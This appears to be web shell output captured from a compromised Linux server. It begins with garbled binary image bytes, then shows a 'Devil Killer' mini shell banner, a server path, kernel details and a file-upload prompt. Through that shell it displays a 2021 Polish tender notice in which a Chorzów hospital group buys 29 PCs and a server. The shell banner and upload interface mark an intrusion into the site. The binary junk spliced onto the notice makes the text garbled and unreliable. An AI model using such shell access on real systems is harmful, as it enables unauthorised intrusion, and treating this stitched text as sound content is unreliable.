JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211108/0026144501-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup serwera sieciowego i zestawów komputerowych wraz z oprogramowaniem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SAMODZIELNY PUBLICZNY ZAKŁAD OPIEKI ZDROWOTNEJ ZESPÓŁ SZPITALI MIEJSKICH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271503410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Strzelców Bytomskich 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chorzów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">323499268</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zsm.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zsm.com.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup serwera sieciowego i zestawów komputerowych wraz z oprogramowaniem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d7699d2e-3e3e-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00261445</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00154725/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.8 Zakup serwera sieciowego oraz zestawów komputerowych wraz z oprogramowaniem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zsm-chorzow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zsm-chorzow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie<br/>komunikował się z Wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej:<br/>a) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywa się przy użyciu środków komunikacji elektronicznej tj. Platformy zakupowej:<br/>https://zsmchorzow.<br/>ezamawiajacy.pl. Ilekroć w dalszej części SWZ jest mowa o: „Platformie zakupowej” – należy<br/>przez to rozumieć narzędzie umożliwiające realizację procesu związanego z udzielaniem zamówień<br/>publicznych w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym służące w szczególności do przekazywania ofert, oświadczeń zwane dalej<br/>„Platformą” lub „eZamawiający”. Informacje dotyczące odpowiedniego przygotowania stanowiska<br/>Wykonawcy znajdą na stronie: https://oneplace.marketplanet.pl/przygotujstanowiskopcwykonujacponizszekroki<br/>b) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Zespołu<br/>Szpitali Miejskich w Chorzowie; https://zsm-chorzow.ezamawiajacy.pl lub<br/>https://oneplace.marketplanet.pl.<br/>c) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>d) rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci<br/>elektronicznej.<br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości<br/>przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu<br/>podanym w ww. potwierdzeniu.<br/>e) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja<br/>między Zamawiającym a Wykonawcami, w szczególności zawiadomienia, informacje oraz dokumenty<br/>przekazywane są w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń, informacji oraz dokumentów przyjmuje się datę ich wysłania za pośrednictwem zakładki<br/>„Korespondencja”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">Próbka o której mowa w pkt. 5.13 I a) SWZ. Próbka powinna być złożona na adres: SP ZOZ Zespół Szpitali Miejskich w Chorzowie ul. Strzelców Bytomskich 11, 41-500 Chorzów w Biurze Podawczym z dopiskiem: „Zakup serwera sieciowego i zestawów komputerowych wraz z oprogramowaniem”. Numer postępowania: ZSM/ZP/31/2021</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. 2.	Obowiązek informacyjny wynikający z art. 13 RODO w przypadku zbierania danych osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia publicznego – Klauzula informacyjna dotycząca Zamawiającego została zamieszczona na ostatniej stronie specyfikacji warunków zamówienia (dalej w treści: SWZ). Natomiast, klauzula informacyjna dotycząca Wykonawcy ujęta jest w pkt. 9 załącznika nr 1 do SWZ – „Formularz ofertowy”. Wykonawca zobowiązany jest zapoznać wszystkich pracowników z klauzulą dot. powierzenia danych osobowych, a których dane zostaną przekazane Zamawiającemu w trakcie i po rozstrzygnięciu postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSM/ZP/31/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 283049,39 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 1 – Zestawy komputerów stacjonarnych z oprogramowaniem - 29 kompletów </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 212658,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30200000-1 - Urządzenia komputerowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30213000-5 - Komputery osobiste</p> <p class="mb-0">30230000-0 - Sprzęt związany z komputerami</p> <p class="mb-0">30231300-0 - Monitory ekranowe</p> <p class="mb-0">48624000-8 - Pakiety oprogramowania dla systemów operacyjnych komputerów osobistych (PC)</p> <p class="mb-0">48771000-3 - Pakiety oprogramowania użytkowego ogólnego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A.	Pc – cena – 60%<br/>B.	Pg – gwarancja – 20%<br/>C.	Ps – czas przyjazdu serwisu gwarancyjnego – 20%<br/><br/>A.	Kryterium „Cena” (Pc) sposób oceny ofert <br/>Ocena ofert w kryterium cena zostanie przeprowadzona na podstawie wyliczeń matematycznych zgodnie z poniższym wzorem. <br/><br/> najniższa cena<br/>Liczba punktów (Pc) = ------------------------------------- x 100 x 60 % <br/> cena badanej oferty<br/><br/>B.	Kryterium „Gwarancja” (Pg) sposób oceny ofert:<br/>Ocena ofert w kryterium gwarancja zostanie przeprowadzona wg następującej skali:<br/>36 miesięcy – 0 punktów<br/>48 miesięcy – 10 punktów<br/>60 miesięcy – 20 punktów<br/><br/>C.	Kryterium „Czas przyjazdu serwisu gwarancyjnego” (Ps) sposób oceny ofert:<br/>Ocena ofert w kryterium czas przyjazdu serwisu gwarancyjnego zostanie przeprowadzona w odniesieniu do zaoferowanego czasu przyjazdu serwisu gwarancyjnego i będzie dokonywana wg następujących zasad:<br/>-Czas przyjazdu serwisu gwarancyjnego do 3 h od rejestracji zgłoszenia – 20 pkt,<br/>-Czas przyjazdu serwisu gwarancyjnego powyżej 3 h, ale nie dłużej niż do 8 h od rejestracji zgłoszenia– 10 pkt,<br/>-Czas przyjazdu serwisu gwarancyjnego powyżej 8 h, ale nie dłużej niż do 24 h od rejestracji zgłoszenia – 0 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas przyjazdu serwisu gwarancyjnego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 2 – Serwer sieciowy<br/>Serwer sieciowy - 1 szt.<br/>Licencja	- 1 szt. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 70390,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Pc – cena	- 60 % <br/>Pg – gwarancja	- 40 % <br/><br/>A.	Kryterium „Cena” (Pc) sposób oceny ofert <br/>Ocena ofert w kryterium cena zostanie przeprowadzona na podstawie wyliczeń matematycznych zgodnie z poniższym wzorem. <br/><br/> najniższa cena<br/>Liczba punktów (Pc) = ------------------------------------- x 100 x 60 % <br/> cena badanej oferty<br/><br/>B.	Kryterium „Gwarancja” (Pg) sposób oceny ofert:<br/>Ocena ofert w kryterium Gwarancja (Pg) zostanie przeprowadzona wg następującej skali:<br/>60 miesięcy – 0 punktów<br/>72 miesiące – 20 punktów<br/>84 miesiące – 40 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia w postępowaniu mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału:<br/>a)	zdolności do występowania w obrocie gospodarczym – Zamawiający nie ustanawia warunku. <br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów – Zamawiający nie ustanawia warunku.<br/>c)	sytuacji ekonomicznej lub finansowej – Zamawiający nie ustanawia warunku.<br/>d)	zdolności technicznej lub zawodowej – warunek ten zostanie spełniony, jeśli: <br/>1)	Wykonawca wykaże, że wykonał należycie w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 1 dostawę związaną z przedmiotem zamówienia, tzn. dostawę zestawów komputerowych stacjonarnych wraz z wraz z konfiguracją, instalacją o wartości co najmniej 200 000,00 PLN brutto, poparte dokumentami potwierdzającymi należyte wykonanie dostawy, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy – dotyczy Pakietu 1;<br/>2)	Wykonawca wykaże, że wykonał należycie w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej 1 dostawę związaną z przedmiotem zamówienia, tzn. dostawę serwera wraz z konfiguracją i usługą opieki serwisowej o wartości co najmniej 50 000,00 PLN brutto, poparte dokumentami potwierdzającymi należyte wykonanie dostawy, wraz z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy – dotyczy Pakietu 2; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	Wykaz wykonanych dostaw, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, (zgodnie z załącznikiem nr 5 do SWZ) , zawierający co najmniej 1 dostawę związaną z przedmiotem zamówienia tzn.:<br/>- dostawę zestawów komputerowych stacjonarnych wraz z wraz z konfiguracją, instalacją o wartości co najmniej 200 000,00 PLN brutto – dotyczy Pakietu 1<br/>- dostawę serwera wraz z konfiguracją i usługą opieki serwisowej o wartości co najmniej 50 000,00 PLN brutto – dotyczy Pakietu 2;<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających, czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są:<br/>- referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane,<br/>- oświadczenie Wykonawcy - jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> I.	PAKIET 1:<br/>a)	Próbka: w celu sprawdzenia poprawności przeprowadzonych wszystkich wymaganych testów Wykonawca zobowiązany jest dostarczyć oprogramowanie testujące, komputer w zaoferowanej konfiguracji zgodnie z opisem przedmiotu zamówienia (załącznik nr 2 do SWZ) do testu wraz z dokładnym opisem metodyki przeprowadzonego testu wydajności PassMark PerformanceTest 10 i wynikami uprzednio wykonanymi przez Wykonawcę celem sprawdzenia poprawności przeprowadzenia testu. Zamawiający wymaga, aby procesor osiągał w teście wydajności PassMark PerformanceTest 10 wynik dostępny: (https://www.cpubenchmark.net/cpu_list.php) co najmniej wynik 11942 punktów Passmark CPU Mark. Wynik testu procesora z dnia 26.10.2021 r. zawiera załącznik nr 7 do SWZ – „dołączyć do oferty” zgodnie z pkt. 9.1 g) SWZ, <br/>b)	Oświadczenie Wykonawcy, że zaoferowany procesor osiąga w teście wydajności PassMark PerformanceTest 10 wynik dostępny: (https://www.cpubenchmark.net/cpu_list.php) co najmniej wynik 11942 punktów Passmark CPU Mark zgodnie z wynikiem testu procesora z dnia 26.10.2021 r. tj. zgodnie z załącznikiem nr 7 do SWZ,<br/>c)	Karty katalogowe lub inne materiały informacyjne potwierdzające oferowane parametry Monitora opisane w OPZ, które zaoferował Wykonawca,<br/>d)	Oświadczenie Wykonawcy potwierdzające spełnienie kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych. Wykonawca sporządza oświadczenie w oparciu o dokumentację producenta stacji roboczej wg wytycznych Krajowej Agencji Poszanowania Energii S.A. [https://www.kape.gov.pl], zawartych w dokumencie „Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych”, pkt 3.4.2.1; dokument z grudnia 2006), w szczególności w odniesieniu do zgodności z normą ISO 1043-4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram,<br/>e)	Oświadczenie producenta komputera (lub inny dokument producenta komputera) oraz raport badawczy głośności wykonany przez notyfikowane laboratorium/jednostkę potwierdzający, że poziom emitowanego hałasu, mierzony wg normy ISO 7779 i wykazany według normy ISO 9296 w pozycji obserwatora w trybie jałowym (tryb IDLE przy uruchomionym systemie Microsoft Windows) wynosi nie więcej niż 22 